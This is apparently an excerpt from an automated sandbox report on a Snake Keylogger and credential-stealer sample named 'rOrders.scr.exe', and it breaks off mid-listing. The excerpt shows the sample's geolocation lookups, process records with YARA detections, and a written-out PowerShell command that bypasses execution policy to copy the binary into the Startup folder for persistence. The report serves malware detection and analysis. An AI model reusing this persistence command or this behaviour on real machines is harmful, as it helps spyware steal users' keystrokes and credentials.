2025-01-13 12:31:35 UTC	853	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 12:31:35 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2086284 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eKgNC2pg%2BJVyR0pN6B3X3NB9Q7fVtVaHG2rQgELwV9ay8v3BzMr2n9M0Au9yNdPmri1eNkNGJEQtPSwPKjI0HObbG5g3fvzf44xu3AUQl6qUss1IOX409CiLMrdLXLFUKG%2BwAm0K"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901567752bfd1875-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1662&min_rtt=1635&rtt_var=632&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1785932&cwnd=153&unsent_bytes=0&cid=ec142c291447f76d&ts=142&x=0"
2025-01-13 12:31:35 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49784	104.21.32.1	443	7192	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 12:31:36 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-13 12:31:36 UTC	857	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 12:31:36 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2086285 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sDjK4BMgKYv7ihNmb152JPPBB5u%2BviZ31yn7zVShmqDM2%2B3wEopMFfCV%2FWmDuAuVl9TYmXelgl9nkSd86Lq5CNcKRyiD36ocXTJ2ZqCzNUMpeMsyxzTxQoW0gL97IQ2mSygX6l%2Bi"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9015677d7bfd41a6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1541&min_rtt=1537&rtt_var=584&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1859872&cwnd=241&unsent_bytes=0&cid=0bfb73e63a7719ef&ts=160&x=0"
2025-01-13 12:31:36 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49794	104.21.32.1	443	7192	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 12:31:37 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-13 12:31:37 UTC	860	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 12:31:37 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2086287 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N%2BilAZ3UgJNZVsUhfQoc%2BotWQjKyqDyiUM%2FllOxf4TAKPQ3g6i6NsFgE%2Bi6%2FNXVE2KF6PiaHlrWjl0xnSI8wBKopks%2BYttL2od2zspNHFPsB31KVN1RRHTa9LIktNH9fWXVHE2ar"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90156785f89a72b9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1777&min_rtt=1777&rtt_var=888&sent=4&recv=6&lost=0&retrans=1&sent_bytes=4236&recv_bytes=699&delivery_rate=226303&cwnd=217&unsent_bytes=0&cid=e55bea24dbb3e79e&ts=142&x=0"
2025-01-13 12:31:37 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Target ID:	0
Start time:	07:31:09
Start date:	13/01/2025
Path:	C:\Users\user\Desktop\rOrders.scr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\rOrders.scr.exe"
Imagebase:	0x760000
File size:	829'952 bytes
MD5 hash:	1FEB066E46D1BEED60404A2A6ADB3D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.4557355431.0000000003CB2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.4557355431.0000000003CB2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.4557355431.0000000003CB2000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.4557355431.0000000003C88000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.4557355431.0000000003C88000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.4557355431.0000000003C88000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.4557355431.0000000003C88000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.4557355431.0000000003CD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.4557355431.0000000003CD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.4557355431.0000000003CD0000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	07:31:10
Start date:	13/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\rOrders.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe'
Imagebase:	0xd00000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	07:31:10
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	07:31:11
Start date:	13/01/2025
Path:	C:\Users\user\Desktop\rOrders.scr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\rOrders.scr.exe"
Imagebase:	0x930000
File size:	829'952 bytes
MD5 hash:	1FEB066E46D1BEED60404A2A6ADB3D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.4536657049.0000000002F4D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.4531261400.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.4531261400.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.4531261400.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000004.00000002.4531261400.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.4536657049.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	07:31:11
Start date:	13/01/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	07:31:22
Start date:	13/01/2025
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe"
Imagebase:	0xed0000
File size:	829'952 bytes
MD5 hash:	1FEB066E46D1BEED60404A2A6ADB3D5A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.4557201022.0000000004391000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 66%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	07:31:23
Start date:	13/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe'
Imagebase:	0xd00000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	07:31:23
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	07:31:24
Start date:	13/01/2025
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe"
Imagebase:	0x990000
File size:	829'952 bytes
MD5 hash:	1FEB066E46D1BEED60404A2A6ADB3D5A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.4538005534.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.4538005534.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	10.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0.7%
Total number of Nodes:	440
Total number of Limit Nodes:	28

Executed Functions

Function 0516B358 Relevance: 7.0, Strings: 5, Instructions: 718COMMON

Download Yara Rule

Strings

,wq, xrefs: 0516B96F
,wq, xrefs: 0516B97F
(osq, xrefs: 0516BBEB
Hwq, xrefs: 0516BC58
(osq, xrefs: 0516BBE1

Memory Dump Source

Source File: 00000000.00000002.4562712723.0000000005160000.00000040.00000800.00020000.00000000.sdmp, Offset: 05160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5160000_rOrders.jbxd

Similarity

API ID:
String ID: (osq$(osq$,wq$,wq$Hwq
API String ID: 0-660065146
Opcode ID: 0138f16153d3190d010ec3c58482f880d0e80ade0c11bbe3cd82a8bc5689553c
Instruction ID: d3489e66fd5b1f60a8d40347743d4de7871d71e7c3aecc6f0f35e7066942699f
Opcode Fuzzy Hash: 0138f16153d3190d010ec3c58482f880d0e80ade0c11bbe3cd82a8bc5689553c
Instruction Fuzzy Hash: A5528E75B081159FCB18DF69C494AAEBBB2FF88310F158069E806EB361DB31ED51CB90

Function 07A71C80 Relevance: 6.9, Strings: 5, Instructions: 651
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hwq, xrefs: 07A73159
Hwq, xrefs: 07A73273
Hwq, xrefs: 07A733BB
Hwq, xrefs: 07A731EC
Hwq, xrefs: 07A732FD

Memory Dump Source

Source File: 00000000.00000002.4567507147.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7a70000_rOrders.jbxd

Similarity

API ID:
String ID: Hwq$Hwq$Hwq$Hwq$Hwq
API String ID: 0-154242596
Opcode ID: cd1080df9ee5370d0cf29ea60d3fbd23fe7566938c07efe1475baa4bc4f093f7
Instruction ID: 90df198bfdee0fcee35f064d878d13cd74039ef8ba800b2b1e5241bc4d4a969b
Opcode Fuzzy Hash: cd1080df9ee5370d0cf29ea60d3fbd23fe7566938c07efe1475baa4bc4f093f7
Instruction Fuzzy Hash: CA426DB1E002588FDB54DFA8C89079EBBF2BF88300F14856AD419AB395DB349D45CFA5

Function 07A7E3A0 Relevance: .4, Instructions: 396COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4567507147.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7a70000_rOrders.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 101985f155dd4af8257cf951ee47640010def48c0e82a0831a848552947d282e
Instruction ID: f7eecc10b768798a8d79f6c1ff462675bff1e6a147289333a016531be1c202b2
Opcode Fuzzy Hash: 101985f155dd4af8257cf951ee47640010def48c0e82a0831a848552947d282e
Instruction Fuzzy Hash: 09F16AB0A04209CFDB14DFA9CD84B9DBBF2BF88314F1485A9E415AB2A5DB70E945CB41

Function 07A72B88 Relevance: .3, Instructions: 282COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4567507147.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7a70000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68188e1eb5574274e708904199eb845f6130378b3838b71225a9820ed2aa0cc8
Instruction ID: 856d150021f8d66187106b6b675169f70a56a6a7a9d13620261305cf4cfd2526
Opcode Fuzzy Hash: 68188e1eb5574274e708904199eb845f6130378b3838b71225a9820ed2aa0cc8
Instruction Fuzzy Hash: EAC158B1E002498FDF15CFA5C98079EBBF2BF89300F15C5AAD859AB255EB309985CF50

Function 051665B0 Relevance: .2, Instructions: 216COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4562712723.0000000005160000.00000040.00000800.00020000.00000000.sdmp, Offset: 05160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5160000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f62a686ff9ed1e8b00697e916319a925d0f1a5eca0f61158e74fcd7f9f94fda
Instruction ID: 4f208890407954ef86bd8a45fdff3f77d0c56afb1c5a63ffe96011ba91e972cd
Opcode Fuzzy Hash: 6f62a686ff9ed1e8b00697e916319a925d0f1a5eca0f61158e74fcd7f9f94fda
Instruction Fuzzy Hash: 66A1CE74E052198FCB14DFA9D684A9EFBF2FF48310F1481AAE409AB356D734A985CF50

Function 0115AD48 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0115AF9E

Strings

,O, xrefs: 0115AED6
,O, xrefs: 0115AEFB

Memory Dump Source

Source File: 00000000.00000002.4535467298.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1150000_rOrders.jbxd

Similarity

API ID: HandleModule
String ID: ,O$,O
API String ID: 4139908857-201552661
Opcode ID: bb35be1c27c7b8635f7d5457232cf61d17add28738aee7b0776c157ac0f6bac9
Instruction ID: 3c7d3c484c9750ce011bd3dc0c65137f31de0a6f043b7a519844446419946827
Opcode Fuzzy Hash: bb35be1c27c7b8635f7d5457232cf61d17add28738aee7b0776c157ac0f6bac9
Instruction Fuzzy Hash: 21713370A00B05CFD768DF29E54175ABBF1FF88304F008A2DE99AD7A40DB75E8458B91

Function 051618E4 Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05161A02

Memory Dump Source

Source File: 00000000.00000002.4562712723.0000000005160000.00000040.00000800.00020000.00000000.sdmp, Offset: 05160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5160000_rOrders.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: f5f42f6949c5d24b1f2996e2c45cb749939c10b9333dbb3edee2ea4bb7228e52
Instruction ID: 51f8f0093510175d44ce603003d5cd65f6eebbe5aa85bae84e068d106e3f47c9
Opcode Fuzzy Hash: f5f42f6949c5d24b1f2996e2c45cb749939c10b9333dbb3edee2ea4bb7228e52
Instruction Fuzzy Hash: B351C2B1D10349AFDF14CF9AC984ADEBBB5FF88310F24812AE819AB210D7759945CF90

Function 051618F0 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05161A02

Memory Dump Source

Source File: 00000000.00000002.4562712723.0000000005160000.00000040.00000800.00020000.00000000.sdmp, Offset: 05160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5160000_rOrders.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 2a6e00828a78dd24eaae2643b30b058d190768d419950931e39bad9f9184920b
Instruction ID: 7122f1a728d54ea4e5cb51c8fd9315d99568b30a1b0f0b73ccd142fa07e34862
Opcode Fuzzy Hash: 2a6e00828a78dd24eaae2643b30b058d190768d419950931e39bad9f9184920b
Instruction Fuzzy Hash: 1741B2B5D10349AFDF14CF9AC984ADEBBB5BF88310F24812AE819AB210D7759945CF90

Function 01154248 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 011559C9

Memory Dump Source

Source File: 00000000.00000002.4535467298.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1150000_rOrders.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 8366074681d682bede6820074161e4a9b7fa95c54e0012e1231acd8c49474038
Instruction ID: ac580b2a41159698c52fda1ee4ab8ca6a291a616f50baac83ddf1db153b3a272
Opcode Fuzzy Hash: 8366074681d682bede6820074161e4a9b7fa95c54e0012e1231acd8c49474038
Instruction Fuzzy Hash: 7041E0B0C0071DCBDB68CFA9C985B9EBBB6FF49304F60806AD418AB251DB756945CF90

Function 0115590D Relevance: 1.6, APIs: 1, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 011559C9

Memory Dump Source

Source File: 00000000.00000002.4535467298.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1150000_rOrders.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 371ab372acc8fd258c4cc9a941d112013ac049f17cc9567f61280b4a756ccf23
Instruction ID: 2380e4ac3d7f797792f1d243e64438982e785c9fa1a803f62d9b0411b168fab9
Opcode Fuzzy Hash: 371ab372acc8fd258c4cc9a941d112013ac049f17cc9567f61280b4a756ccf23
Instruction Fuzzy Hash: 7941DFB0C10719CEDB28CFA9C985B9EBBB6FF49304F60806AD418AB251DB756946CF50

Function 05164050 Relevance: 1.6, APIs: 1, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 05164111

Memory Dump Source

Source File: 00000000.00000002.4562712723.0000000005160000.00000040.00000800.00020000.00000000.sdmp, Offset: 05160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5160000_rOrders.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 0ced981e197c90e604571180cc632f25cec2a0df44ac95ae4c9c43bf7facece4
Instruction ID: ab225bc8a47bf6980e2ab3e69465ab9bd4a98db3e5cb46cae17d8b34141092b3
Opcode Fuzzy Hash: 0ced981e197c90e604571180cc632f25cec2a0df44ac95ae4c9c43bf7facece4
Instruction Fuzzy Hash: 90411DB9900305CFCB14CF99C889AAABBF6FF88314F24C559D519AB321D775A841CFA0

Function 07A73708 Relevance: 1.6, APIs: 1, Instructions: 78windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?), ref: 07A737BD

Memory Dump Source

Source File: 00000000.00000002.4567507147.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7a70000_rOrders.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 20fd51e9e58ba2ae4c8daff1d6036bd43b2e4e55991c1854fd9d3be4b4774d1e
Instruction ID: 89395d776662bd32a08b4c8fd8437e9ea9d5272c7fb51bac7ad0440411b6f0d6
Opcode Fuzzy Hash: 20fd51e9e58ba2ae4c8daff1d6036bd43b2e4e55991c1854fd9d3be4b4774d1e
Instruction Fuzzy Hash: C1215AB59002499FCB14DFA9C885BDEBFF8EF48320F24445AE519A7751C775A940CFA0

Function 0115B730 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0115D5E6,?,?,?,?,?), ref: 0115D6A7

Memory Dump Source

Source File: 00000000.00000002.4535467298.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1150000_rOrders.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: c2a9b96e51c0a6ff09dac9d87d235124777c40b90936e326899acacbf5024369
Instruction ID: 068f4496a37401975063b1199e85b02ad6933cf2190b0864ade067a48bd54dbc
Opcode Fuzzy Hash: c2a9b96e51c0a6ff09dac9d87d235124777c40b90936e326899acacbf5024369
Instruction Fuzzy Hash: 1C21E6B5900208DFDB10CF9AD584ADEBFF8FB48310F14841AE918A7310D374A940CFA5

Function 0115D619 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0115D5E6,?,?,?,?,?), ref: 0115D6A7

Memory Dump Source

Source File: 00000000.00000002.4535467298.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false

Joe Sandbox IDA Plugin

